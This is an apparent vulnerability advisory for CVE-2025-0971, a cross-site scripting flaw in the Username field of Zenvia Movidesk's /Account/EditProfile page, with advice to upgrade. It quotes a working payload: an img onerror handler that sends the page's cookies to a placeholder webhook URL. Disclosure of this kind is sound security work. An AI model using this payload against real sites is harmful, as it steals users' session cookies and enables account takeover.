CVE-2025-0971 | Zenvia Movidesk up to 25.01.22 Profile Editing /Account/EditProfile Username cross site scripting
A vulnerability marked as problematic has been reported in Zenvia Movidesk up to 25.01.22. Affected by this issue is some unknown functionality of the file /Account/EditProfile of the component Profile Editing. This manipulation of the argument Username with the input <img src="x" onerror="this.src='https://YOUR-WEBHOOK-URL?c=' + document.cookie;"> causes cross site scripting.
This vulnerability is handled as CVE-2025-0971. The attack can be initiated remotely. Additionally, an exploit exists.
It is suggested to upgrade the affected component.